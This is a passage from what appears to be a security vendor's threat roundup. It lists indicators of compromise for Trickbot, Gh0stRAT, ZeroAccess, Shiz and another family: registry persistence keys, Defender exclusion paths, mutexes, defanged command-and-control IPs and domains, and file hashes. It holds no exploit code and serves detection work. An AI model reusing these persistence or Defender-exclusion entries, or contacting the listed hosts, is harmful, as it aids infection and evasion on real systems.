\n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config2 ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 10 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\vocihpvk ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\qjxdckqf ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue 
Name: C:\\Windows\\SysWOW64\\piwcbjpe ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\yrflksyn ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\cvjpowcr ` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`239[.]255[.]255[.]250` | 16 \n`69[.]55[.]5[.]250` | 16 \n`172[.]217[.]11[.]36` | 16 \n`46[.]4[.]52[.]109` | 16 \n`176[.]111[.]49[.]43` | 16 \n`85[.]25[.]119[.]25` | 16 \n`144[.]76[.]199[.]2` | 16 \n`144[.]76[.]199[.]43` | 16 \n`43[.]231[.]4[.]7` | 16 \n`192[.]0[.]47[.]59` | 16 \n`74[.]6[.]137[.]65` | 16 \n`172[.]217[.]7[.]132` | 16 \n`98[.]137[.]159[.]27` | 16 \n`95[.]181[.]178[.]17` | 16 \n`168[.]95[.]5[.]116` | 15 \n`74[.]125[.]141[.]27` | 15 \n`74[.]125[.]193[.]26` | 15 \n`67[.]195[.]228[.]109` | 14 \n`212[.]82[.]101[.]46` | 13 \n`168[.]95[.]5[.]216` | 13 \n`67[.]195[.]228[.]111` | 13 \n`67[.]195[.]230[.]36` | 13 \n`69[.]31[.]136[.]5` | 12 \n`212[.]227[.]17[.]8` | 12 \n`213[.]209[.]1[.]129` | 12 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`250[.]5[.]55[.]69[.]in-addr[.]arpa` | 16 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 16 \n`250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 16 \n`mta5[.]am0[.]yahoodns[.]net` | 16 \n`250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 16 \n`whois[.]iana[.]org` | 16 \n`250[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 16 \n`whois[.]arin[.]net` | 16 \n`250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 16 \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 16 \n`honeypus[.]rusladies[.]cn` | 16 \n`marina99[.]ruladies[.]cn` | 16 \n`sexual-pattern3[.]com` | 16 \n`coolsex-finders5[.]com` | 16 \n`super-efectindating1[.]com` | 16 \n`msx-smtp-mx1[.]hinet[.]net` | 15 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 14 \n`msx-smtp-mx2[.]hinet[.]net` | 14 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 13 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`eur[.]olc[.]protection[.]outlook[.]com` | 13 \n`web[.]de` | 12 \n`etb-1[.]mail[.]tiscali[.]it` | 12 \n`mx-ha02[.]web[.]de` | 12 \n`msa[.]hinet[.]net` | 12 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 16 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 16 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 16 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 16 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 16 \n`%TEMP%\\edtpwsx.exe` | 1 \n`%TEMP%\\ondzgch.exe` | 1 \n \n#### File Hashes\n\n` 1c331b81428107c325673ea4b19acdff598772d9e1069e09ca92cb88d223c326 1c916b795f49331678816ef6cfba0dbdbddd4b92a421e086ab2fe2ea095d10e9 398c23230679c69942c5d64c7aaf0e9e8ca3434d54559871f3a3a24fbd9ffa3c 4d660a6519c258074627f7d30a4878e15a4e621bd79f21a34f4550c54ef38c4e 5f4bd5a0728432e4731b9d2606bacb05d7c6f10ad926735f3e4d9dee10791f85 7d96ef5dfba65346fa3ffbcd23016f21e0a523e2215e963f21cc8c939c2e35a0 9bf983cc999b2a3bd029e21e445bca85853b58d66247c7221157fab41fbd19d8 
9e5897942fac812b74be41b06b5e1cd1ff4e9fd9b71d10aadca3d5f368cda0d1 a8adbab4a72506f7343b7ff78a028fd26ec944a1d4de846ee0bf9651196d7724 a8f74812b66b89f9c0450b2f565d3ba2b417e7e10514618c3306de37749af886 ad34ec4764147faaee82935e142eedfe5569f88ef81195281539075a0f3c91ac b4f6aa14eb833c83413f72a4e901d0e92c7da45828c5438594693f68c2a3ebfe b75a2838b93b6ec47b27bd5c9798386775e9a3dfcac5c3562a7ff139eaa14ce3 be8a71e6dfa63485be4a848cf6d0bc1da15b20fb9735e0c0ed08e346840096e0 d62553c4ef53220d32af9e5eb1a0accca3ca6aac7e9f3539119fec0718edd65b f095b72dc6ba5c3c3f2e410d0f1766a8f6ebbecec1a4914b957f9a7225cc6c00 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-tUfWJk_0YKw/XVbLZsk_8QI/AAAAAAAACWY/S347748S0YsFfeD27hEPz8BJSY96EwO8gCLcBGAs/s1600/9bf983cc999b2a3bd029e21e445bca85853b58d66247c7221157fab41fbd19d8_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-cCEa3EBp6J8/XVbLfVvnovI/AAAAAAAACWc/DkaXxgGWNC8oJ1ddxBD1euwoNTbCjHvQACLcBGAs/s1600/9bf983cc999b2a3bd029e21e445bca85853b58d66247c7221157fab41fbd19d8_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-uemif8GUhTM/XVbLkiwBxqI/AAAAAAAACWg/AvwNQHKs1xUl7qLg5YSM6oJpybr3DHmbgCLcBGAs/s1600/213b7ea1e4fee2c08e48c1536b099ab55b0ace638710a8c1920a834ac80648b5_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7112005-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\VLock` | 25 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`116[.]203[.]16[.]95` | 6 \n`216[.]239[.]34[.]21` | 5 \n`194[.]87[.]92[.]184` | 4 \n`188[.]137[.]122[.]83` | 4 \n`185[.]158[.]115[.]75` | 4 \n`185[.]158[.]115[.]49` | 4 \n`216[.]239[.]32[.]21` | 3 \n`216[.]239[.]38[.]21` | 3 \n`216[.]239[.]36[.]21` | 3 \n`185[.]158[.]115[.]87` | 3 \n`188[.]137[.]122[.]68` | 3 \n`195[.]133[.]146[.]156` | 3 \n`94[.]242[.]206[.]204` | 3 \n`198[.]27[.]74[.]146` | 2 \n`50[.]16[.]229[.]140` | 2 \n`194[.]87[.]232[.]146` | 2 \n`23[.]21[.]121[.]219` | 1 \n`104[.]20[.]17[.]242` | 1 \n`54[.]243[.]147[.]226` | 1 \n`54[.]235[.]124[.]112` | 1 \n`104[.]20[.]16[.]242` | 1 \n`23[.]23[.]243[.]154` | 1 \n`3[.]224[.]145[.]145` | 1 \n`34[.]196[.]181[.]158` | 1 \n`23[.]23[.]83[.]153` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 6 \n`ip[.]anysrc[.]net` | 6 \n`api[.]ipify[.]org` | 5 \n`myexternalip[.]com` | 3 \n`icanhazip[.]com` | 2 \n`ipecho[.]net` | 2 \n`checkip[.]amazonaws[.]com` | 2 \n`wtfismyip[.]com` | 2 \n`elb097307-934924932[.]us-east-1[.]elb[.]amazonaws[.]com` | 2 \n`checkip[.]us-east-1[.]prod[.]check-ip[.]aws[.]a2z[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\winapp\\Modules` | 25 \n`%System32%\\Tasks\\services update` | 25 \n`%APPDATA%\\winapp\\client_id` | 25 \n`%APPDATA%\\winapp\\group_tag` | 25 \n`%APPDATA%\\winapp` | 25 \n`%APPDATA%\\WINAPP\\<original file name>.exe` | 25 \n`%SystemRoot%\\Tasks\\services update.job` | 23 \n \n#### File Hashes\n\n` 00c98d727a85576416dba2a3a68010f986ae276935435e6d9eb02d33fb71b3a3 0143365726dffade4573b49e8c816d414c8ca96567a8163cbb714a4b9c18df2d 051eeb1a5f4ef84caff3c5a7abcebb1839569516480df43c929aba282eb8ecb2 0fff84cfd0c674f7d55a39cb6be3bb7fccb3549dbfd9bc8f8b4c8c6307cc5102 112a18bcbc8424b2bdb7ea574f5696288d28a28dda3f0aaa9894a84285c932aa 11513df12b19240af3485b6b0d0c871c305e2644e6503770baf8fb2949542462 
19910cf1b0fb40f8143c459e93a6110393b502de81646ed7685c7a0766e4823d 2807fea0af4c94116f0677eb94d798b6f40c3a3cc50ed8d2d2184a061ce30904 292920637d78485e4053b4a056d569f2e17cb8ab531f3372d18402c35fd735bf 30938782dd1ae8ff1a35c17821860745f613a5267e18171e7336d1c6d5f5b6b1 30f321827bea98609847dc047de756f7b86074bb3f5c6e4c7875f25db5dcd627 362d936eebd48241b9e3b6ae0f8650365af42aa307320438ae170862750b2a08 3dd50fe971d7256311dab97ac7afeb0a6ec91de2feccb125eb09ac8a22947005 3e98c771dd86669152fb58cfc0ecd7d264426ebe125ee4d96893efad5af5d236 3ecf64c343752bfbed1a8984cfb207309133df964da0b2e086509e8aed167a66 541729295b97eaa2ec3a566c2095b5e4c03239d9b1235d4a2b6331f3dd986f75 639adafd87d067c1cc5c5d1be870f3800e719637dab20e435f379fc86b268d15 653fc5565b1e8746ddaa507722815fc225ce5c327fa69dbbdaf8924880197035 6809cf34ac7fa454a8d8c25482c7a9acb44be1222bc89f2d478a953d93f63f3d 74547a954562f29ea05230900daab9c043e088fd1a38cb2d077ba4624ef51523 7a7029415edf56936d5eaf003f413a0b778fbc279168cc7cc5e3166a14aaf69a 7be5520d05f7f6afc0dbdf945faa7c93dbc3d3394a6fc8fc30532a6d241f10a1 7bf167e2fd1ad3b45e42fcfce427c702cdb4df6e96602a183fee57d777140a18 854124fe1ae699a3dfd99b89a0b44101e74039ea8f06c781254f4aeca07b7013 8a58ff91b277c4b10565d90fa8e0d847759276fa77983762337dc6bf916aa78e `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-N8AdJwU4a98/XVbMqd2--MI/AAAAAAAACW0/heAk2waBQ1kC3rhdZcCgq-MeH_ixTuSCwCLcBGAs/s1600/30938782dd1ae8ff1a35c17821860745f613a5267e18171e7336d1c6d5f5b6b1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-2h5biapK0CA/XVbMt5O1qfI/AAAAAAAACW4/Np-Hf6aUiSEysqfo41dIpVoH4me2F7VXwCLcBGAs/s1600/30938782dd1ae8ff1a35c17821860745f613a5267e18171e7336d1c6d5f5b6b1_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### 
Win.Malware.Gh0stRAT-7109635-2\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STUVWX ` | 26 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\STUVWX \nValue Name: MarkTime ` | 26 \nMutexes | Occurrences \n---|--- \n`193.112.13.217:7788:Stuvwx` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`193[.]112[.]13[.]217` | 26 \n \n#### File Hashes\n\n` 0cc11eb852f66920b4a4a35dc34b4e05f3612640b1963bd0ef8088022e2451f7 103960c11c696e1ed51771fec28b70d5cd0c1feb071575e4122827ac7541092b 1156fabd2305bd3ce5b218a59c3f3cfd99671dc8323fda13c156aebf26ee3ed8 11978ef69a330b0d4cc544f48bafbca5125019fe147fcaf2db0bd72fe94c4b4a 164c0c94d252f388ab7825a8bd9abf8cacc45cbf34281edb72951982874591ab 1af0bbdad437c6f711447ccb84444b92df5ba237acc0b33f6eebe0d48fd2f5a2 1ef070ae000ecca44fd13b1c3b642a7a5ef8894becc9a228f2aba33c04f267d5 24436d1687d5a814d3552f9fe6aed8d3778a66888508d1685d7c8c39d4b3b5a5 249cea1515c2c625b5e117a9495cce088f64dfe39dfab2b9d47d9071e2516900 2512e7506467e005bda030357121e832ff0dddc6a670ae4c732bac8345a0e2cf 265c64b98cd0d8515c829654ea931d751e9526b61f45f1d4799c41578f94534c 26f34567a93de01d7e6853e9ae31eb0f1848dee525b0ee605e1c1884accc4982 274d09e6e43dc96ba17a782a30afd525c972f3ad50e73655d8cbfe94ea97b481 2add1b8118caae8e35384758ffabf7fb9cd5eed7e7ae6189572f92993176cf7c 2c771b1e0003485b554e8014b428c9d53ad93d457c04c96b9e514f0f33e2e6ba 2cdd4e59d78f0a3537c1e1c5a7b9fb4c369a20d79a057568a51a2cbebb2f8241 2dae697a1aa350218fb9c4c6ed9d28caa9eff1ad7bfbd0feb32dc523e5c7baf9 3073891867551a6f111eb2f8af3e02729bf97627da4d019fc289433de4cfc35b 30fe5c510a0dc5ad89fcd66491ff24f605a90a2c4a53c67a9969fe15a4a5d0a7 313e7c484e87f221fe3e7af0aab2e17eac7c5a1f1a6c6fcf96140f1a24ba95ba 3176a16b8d3fdcd6162a24ea2979f82d8d1ec4bb98e15c299affd56704bf30d6 32824a80e061fa64a2cc928d3fbde4f742dfb22b4bd9daa13c2e5ab80697c836 333afdc84193d7b7b0d4d1c1e94fcd38426660db5f0fe8fb6dff57d0436a72eb 
34e270be03c14465005a11e6eeca6c6c6437f24d9d0a120387cdc759519ad751 352d10cb6917a8bd67bd4054b5307ee38caa2ca63be034edda31371954fccb70 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-sE-75RhSGw0/XVbM-tgtJKI/AAAAAAAACXE/Nl8lKI8XHBcLzK-7sm8rQ-wTVWYDx69IACLcBGAs/s1600/2512e7506467e005bda030357121e832ff0dddc6a670ae4c732bac8345a0e2cf_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-4a-eui_dFv0/XVbNEm4eFOI/AAAAAAAACXI/HkgHAlRD-pAQzCTBSVTwsDpvNT0XbQOXQCLcBGAs/s1600/a70e8def87bb52571c269bdaa39175a388b5ec4efb6a8c12a38cfa91ded75c18_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Zeroaccess-7109532-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MPSSVC \nValue Name: DeleteFlag ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: DeleteFlag ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BROWSER \nValue Name: Start ` | 19 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 \nValue Name: ThreadingModel ` | 19 \n`<HKCR>\\CLSID\\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\\INPROCSERVER32 ` | 19 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Windows Defender ` | 19 \n`<HKLM>\\SOFTWARE\\CLASSES\\CLSID\\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\\INPROCSERVER32 ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: Type ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WINDEFEND \nValue Name: ErrorControl ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Type ` | 19 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: ErrorControl ` | 19 
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC`, Value Name: `Type` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC`, Value Name: `ErrorControl` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC`, Value Name: `DeleteFlag` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC`, Value Name: `Type` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC`, Value Name: `ErrorControl` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC`, Value Name: `Type` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC`, Value Name: `ErrorControl` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000010`, Value Name: `PackedCatalogItem` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000009`, Value Name: `PackedCatalogItem` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000008`, Value Name: `PackedCatalogItem` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000007`, Value Name: `PackedCatalogItem` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000006`, Value Name: `PackedCatalogItem` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000005`, Value Name: `PackedCatalogItem` | 19
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINSOCK2\PARAMETERS\PROTOCOL_CATALOG9\CATALOG_ENTRIES\000000000004`, Value Name: `PackedCatalogItem` | 19

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`222[.]254[.]253[.]254` | 19
`83[.]133[.]123[.]20` | 15
`88[.]254[.]253[.]254` | 15
`92[.]254[.]253[.]254` | 15
`117[.]254[.]253[.]254` | 15
`115[.]254[.]253[.]254` | 15
`87[.]254[.]253[.]254` | 15
`134[.]254[.]253[.]254` | 14
`119[.]254[.]253[.]254` | 14
`184[.]254[.]253[.]254` | 12
`180[.]254[.]253[.]254` | 12
`182[.]254[.]253[.]254` | 12
`190[.]254[.]253[.]254` | 12
`206[.]254[.]253[.]254` | 12
`166[.]254[.]253[.]254` | 12
`197[.]254[.]253[.]254` | 12
`135[.]254[.]253[.]254` | 11
`178[.]148[.]144[.]15` | 9
`74[.]194[.]69[.]92` | 9
`68[.]173[.]181[.]191` | 9
`188[.]67[.]123[.]100` | 9
`78[.]221[.]193[.]65` | 8
`198[.]96[.]34[.]46` | 8
`68[.]64[.]113[.]104` | 8
`24[.]35[.]22[.]12` | 8

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`j[.]maxmind[.]com` | 15
`uikvdwhrextuxymklwbrodjzhj[.]com` | 1
`xikzzyxnfkaepapadgned[.]com` | 1

Files and or directories created | Occurrences
---|---
`\systemroot\assembly\GAC_32\Desktop.ini` | 19
`\systemroot\assembly\GAC_64\Desktop.ini` | 19
`%System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de8` | 19
`%SystemRoot%\assembly\GAC_32\Desktop.ini` | 19
`%SystemRoot%\assembly\GAC_64\Desktop.ini` | 19
`\$Recycle.Bin\S-1-5-18` | 19
`\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f` | 19
`\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@` | 19
`\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L` | 19
`\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U` | 19
`\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n` | 19
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f` | 19
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@` | 19
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L` | 19
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U` | 19
`\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n` | 19
`\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\@` | 17
`\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\n` | 17
`\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\@` | 17
`\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\n` | 17
`%SystemRoot%\assembly\GAC\Desktop.ini` | 17
`4.@ (copy)` | 1
`8.@ (copy)` | 1
`80000000.@ (copy)` | 1
`80000032.@ (copy)` | 1

*See JSON for more IOCs

#### File Hashes

```
64f81a35325dd38c136a632f0e23d167407a0c4963a70761d4ab5707775f0d23
67ebc3153ede004c1af8b82ecd6f4713573f4c29b4a84c0500d761f483ad9172
688db1253d2dcdaf11bb2e8f03790dea9b10625b14b20531f4ea108801066f62
78951871e9a63fa3907da13165bab1119addd1ce8a3b376afae47b532e5d3653
7d8a67472d130e64d41205a7c1e5263b4fe6a4c6dc2b413618fd9e38ce47f536
8eea2b29e69058398957d5972b62b47947d090c2610bcd45ee593fa92bf25004
91fff0045ed0ac9433217ee7dd1f5ede0554588995892e026044d8d9f9371e1a
9a254fc4e4ca669bab5ad0a830ab43a9ebee6b835fdf794f76a8575d2ca8d548
9db192e4eced11fc3f84d6d8f6302e0230798993bc2b9efca6170428fba13906
a1335dcc4001df7691151413c8c1280dcda1a28a5bd21e82673de4d7560116b7
a2f377e3ff205bc71b5c2a88957578d2a6fb9d390d7ba19fa5117fb0f17736b3
c11c70ca57c92e7224b2c011bb8559d5214ff644fec730a52e02eee172a8a043
c443515f2c11f9cce0be0bd88532bd2b0885d2836bb0b5abb4c2e9198bb2121b
d17a1fb8e452ae4fce1f2763a32b209b6663c600dcf253fd1e943e481ca90e63
dcfd777c230140e79392ba5adf4f6aa9ae249d68eb18cf2ba3b74eca47a2b3c2
df6e0399978745daad9974c24eecc3859740bc2e2ece4a7ec970cefcdd5a5bbe
eb5d5d7b8119f0819a9f00bd20e3c200e9e938a7705bcad0afc86f254d62a78c
efbf80ac6287c82b3231e87957271cadf5c5130eeea7b2e456ffa8b002cbde62
f12f6a6b3358a8dee157fa6bc7170d94cbf2e6f890c86791af20c1a841c01c17
f77e3f0bf61edecfc8f50904e19b9746ba78be95520288d824b61777b04649c6
```

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

![AMP detection](<https://1.bp.blogspot.com/-uK9BlH_AHNk/XVbNUeQXZKI/AAAAAAAACXU/iplNEGFNAvgIwEryWosVwR2nTNw1ck5OQCLcBGAs/s1600/eb5d5d7b8119f0819a9f00bd20e3c200e9e938a7705bcad0afc86f254d62a78c_amp.png>)

#### ThreatGrid

![ThreatGrid detection](<https://1.bp.blogspot.com/-9llWPKXg6GY/XVbNbl5VbdI/AAAAAAAACXY/d0CFv-y6C2I7su6FXSgShCoR2VvZXamDwCLcBGAs/s1600/688db1253d2dcdaf11bb2e8f03790dea9b10625b14b20531f4ea108801066f62_tg.png>)

* * *

### Win.Trojan.Shiz-7108197-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\MICROSOFT`, Value Name: `67497551a` | 18
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON`, Value Name: `98b68e3c` | 18
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON`, Value Name: `userinit` | 18
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON`, Value Name: `System` | 18
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS`, Value Name: `load` | 18
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS`, Value Name: `run` | 18
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN`, Value Name: `userinit` | 18

Mutexes | Occurrences
---|---
`Global\674972E3a` | 18
`Global\MicrosoftSysenterGate7` | 18
`internal_wutex_0x00000120` | 18
`internal_wutex_0x00000424` | 18
`internal_wutex_0x00000474` | 18
`internal_wutex_0x000004a0` | 18
`\BaseNamedObjects\Global\C3D74C3Ba` | 17

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`23[.]253[.]126[.]58` | 18
`208[.]100[.]26[.]251` | 18
`104[.]239[.]157[.]210` | 18
`45[.]77[.]226[.]209` | 18
`198[.]187[.]30[.]249` | 14
`35[.]231[.]151[.]7` | 12
`13[.]107[.]21[.]200` | 10
`35[.]229[.]93[.]46` | 9
`204[.]79[.]197[.]200` | 8

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`MAMASUFEXIX[.]EU` | 18
`FODAVIBUSIM[.]EU` | 18
`LYKONURYMEX[.]EU` | 18
`qetoqolusex[.]eu` | 18
`PUPUCUVYMUP[.]EU` | 18
`vocupotusyz[.]eu` | 18
`gaherobusit[.]eu` | 18
`MAGOFETEQUB[.]EU` | 18
`RYCUCUGISIX[.]EU` | 18
`KEJYWAJAZOK[.]EU` | 18
`puvewevodek[.]eu` | 18
`gahyfesyqad[.]eu` | 18
`MAVEJYKIDIJ[.]EU` | 18
`lyvevonifun[.]eu` | 18
`rydopapifel[.]eu` | 18
`kemimojitir[.]eu` | 18
`CIQUKECYWIV[.]EU` | 18
`FOXOFEWUTEQ[.]EU` | 18
`tucyzogojat[.]eu` | 18
`JEJYKAXYMOB[.]EU` | 18
